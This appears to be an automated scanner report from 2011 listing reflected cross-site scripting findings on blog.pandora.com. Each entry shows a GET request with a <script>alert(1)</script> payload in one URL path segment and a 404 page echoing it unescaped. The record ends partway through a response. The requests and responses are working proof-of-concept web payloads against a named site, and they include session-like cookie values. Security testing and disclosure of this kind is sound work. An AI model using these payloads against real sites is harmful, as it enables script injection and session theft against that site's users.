GET /pandora31f0f<script>alert(1)</script>5b0b1194bdd/archives/colorado/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora31f0f<script>alert(1)</script>5b0b1194bdd/archives/colorado/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3b9f5<script>alert(1)</script>be7f68e6c8b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives3b9f5<script>alert(1)</script>be7f68e6c8b/colorado/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:48 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives3b9f5<script>alert(1)</script>be7f68e6c8b/colorado/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f5a5f<script>alert(1)</script>64acfed229b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/coloradof5a5f<script>alert(1)</script>64acfed229b/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:51 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/coloradof5a5f<script>alert(1)</script>64acfed229b/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 84903<script>alert(1)</script>0d232e15ba4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora84903<script>alert(1)</script>0d232e15ba4/archives/florida/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:55 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora84903<script>alert(1)</script>0d232e15ba4/archives/florida/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fc611<script>alert(1)</script>144240895da was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesfc611<script>alert(1)</script>144240895da/florida/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesfc611<script>alert(1)</script>144240895da/florida/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c2e2a<script>alert(1)</script>2320b502118 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/floridac2e2a<script>alert(1)</script>2320b502118/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:59 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/floridac2e2a<script>alert(1)</script>2320b502118/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f19a8<script>alert(1)</script>5f361df41b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraf19a8<script>alert(1)</script>5f361df41b9/archives/georgia/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:50 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraf19a8<script>alert(1)</script>5f361df41b9/archives/georgia/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9bc1a<script>alert(1)</script>bc0dd599e1c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives9bc1a<script>alert(1)</script>bc0dd599e1c/georgia/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives9bc1a<script>alert(1)</script>bc0dd599e1c/georgia/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b929c<script>alert(1)</script>ae5fbffaaf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/georgiab929c<script>alert(1)</script>ae5fbffaaf/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:54 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/georgiab929c<script>alert(1)</script>ae5fbffaaf/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 937ab<script>alert(1)</script>11ad1856e10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora937ab<script>alert(1)</script>11ad1856e10/archives/illinois/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora937ab<script>alert(1)</script>11ad1856e10/archives/illinois/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload aecb2<script>alert(1)</script>bbd3bee6ead was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesaecb2<script>alert(1)</script>bbd3bee6ead/illinois/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:59 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesaecb2<script>alert(1)</script>bbd3bee6ead/illinois/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 37ffe<script>alert(1)</script>8413af64462 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/illinois37ffe<script>alert(1)</script>8413af64462/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 350
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/illinois37ffe<script>alert(1)</script>8413af64462/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ba293<script>alert(1)</script>35298219914 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraba293<script>alert(1)</script>35298219914/archives/images/map.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 356
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraba293<script>alert(1)</script>35298219914/archives/images/map.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 11e99<script>alert(1)</script>0ea477101ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives11e99<script>alert(1)</script>0ea477101ec/images/map.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 356
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives11e99<script>alert(1)</script>0ea477101ec/images/map.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6f474<script>alert(1)</script>abd6920173d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/images6f474<script>alert(1)</script>abd6920173d/map.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:11 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 356
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/images6f474<script>alert(1)</script>abd6920173d/map.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b4bae<script>alert(1)</script>09286fec01b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/images/map.htmlb4bae<script>alert(1)</script>09286fec01b HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:13 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 356
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/images/map.htmlb4bae<script>alert(1)</script>09286fec01b was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c18ce<script>alert(1)</script>7ecc04df193 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorac18ce<script>alert(1)</script>7ecc04df193/archives/indiana/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorac18ce<script>alert(1)</script>7ecc04df193/archives/indiana/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f8819<script>alert(1)</script>89fc3a9ebb4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesf8819<script>alert(1)</script>89fc3a9ebb4/indiana/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesf8819<script>alert(1)</script>89fc3a9ebb4/indiana/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6554d<script>alert(1)</script>6f5884afdfb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/indiana6554d<script>alert(1)</script>6f5884afdfb/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/indiana6554d<script>alert(1)</script>6f5884afdfb/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bd390<script>alert(1)</script>573c7e0b3bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorabd390<script>alert(1)</script>573c7e0b3bc/archives/louisiana/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 351
